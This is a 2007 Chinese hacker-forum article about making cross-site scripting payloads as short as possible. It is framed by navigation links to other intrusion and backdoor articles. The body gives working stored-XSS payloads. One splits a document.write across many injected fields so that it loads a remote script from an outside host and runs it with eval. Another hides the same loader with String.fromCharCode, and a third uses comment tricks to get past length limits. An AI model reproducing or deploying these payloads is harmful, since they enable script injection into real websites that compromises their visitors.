·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]寻找最短的跨站代码

热荐 ★★★★★

寻找最短的跨站代码

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-7-7 9:42:07

那天剑心问我，最短的跨站语句是多少？要放在以前，我一定会这样想，正常的跨站代码：<script>alert("a")</script> ，查一下，一共27个字符。嘿嘿，不过，这之前我在《黑客手册》上看到了他的一篇文章，《疯狂的跨站之行》，在这其中提到了跨站语句的另一种方法：

以下是引用片段：
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.pc010'</script>
<script>z=z+'.cn/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.pc010'</script>
<script>z=z+'.cn/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

将这些语句分别写入，只要所写入的语句在一个页面中显示，那么这些代码最后就会引入到变量z中，总到一块就是：

以下是引用片段：
document.write("<script src=http://www.pc010.cn/1.js></script>")

然后用eval()函数来执行这个z变量，就可以执行出跨站效果了。lcx在文章的评论中说，最小的有效利用代码可以是26个字母，就是<script>z=z+'d"'</script>，答案不就出来了，最小的跨站是26个字符。（今天在网上查找资料时，发现利用这种方法还可以少一个字符，就是：<script>z+='d"'</script>，用+=来代替=z+，嘿嘿，又可以减少一个字符，25个字符，不过，也好伤心，我好像只能在别人的基础上面有所突破！:( ）。回复剑心后，他竟回了一个笑脸，我感觉这家伙一定又找出了更短的跨站方法。

果不其然，今天翻开《黑客手册》第九期中的《phpwind漏洞之行》（因为一些原因，好久没有仔细看过书了），在其中提到了更短的跨站代码，如下：

以下是引用片段：
<script>open(/*
*/"http://127"/*
*/+".0.0.1/"/*
*/)</script>

这其中的/*和*/是script的注释语句，将这些语句分别提交，同样的条件是这些提交的代码必须在一个页面中，这样最后所显示的就是：

以下是引用片段：
<script>open(/*不会显示的无效内容*/"http://127"/*不会显示的无效内容*/+".0.0.1/"/*不会显示的无效内容*/)</script>

那么这个的最短的语句是多少呢？貌似<script>不能分开应用，除了这个，script所定义的函数比如open之类的，好像分开后也不能正常运行了，这样的话，

先将最上面的语句：document.write("<script src=http://www.pc010.cn/1.js></script>") 转为10进制表示字符：

100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,
116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,59

然后用eval加String.fromCharCode来执行：<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,
116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,59))</script>

下面就用剑心的方法来进行拆分：

以下是引用片段：
<script>/*
*/eval(/*
*/String/*
*/./*
*/fromCharCode/*
*/(100,/*
*/111,99,/*
*/......./*
*/59))/*
*/</script>

中间的....表示的字符和前面的一样，这其中最长的一个语句是：*/fromCharCode/* ，16个字符，因为这是script自已保留的函数名，拆分的话，就不能运行了，由此可以看出，最小的跨站语句是由所采用的函数来定的。

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：百度空间挂马分析!

下一篇文章： NOD32 控制中心密码遗忘解决方法

【字体：小大】

中介交易区

没有路由密码权限时的鸽子上线方	08-23
完全解析网页后门和挂马	04-02
真实的网络攻击取证纪实	03-27
利用404错误页面挂马	03-21
解密风暴	03-21
社会工程学在黑客中的应用	01-02
轻轻松松解密各种网页木马	12-21
SA权限无xp_cmdshell时取权限又一	12-14
sqlserver2005中恢复xp_cmdshell	11-10
实现无net.exe和net1.exe添加系统	10-26
用U盘轻松去除XP管理员密码	10-26
教你多种保护措施限用移动硬盘	10-09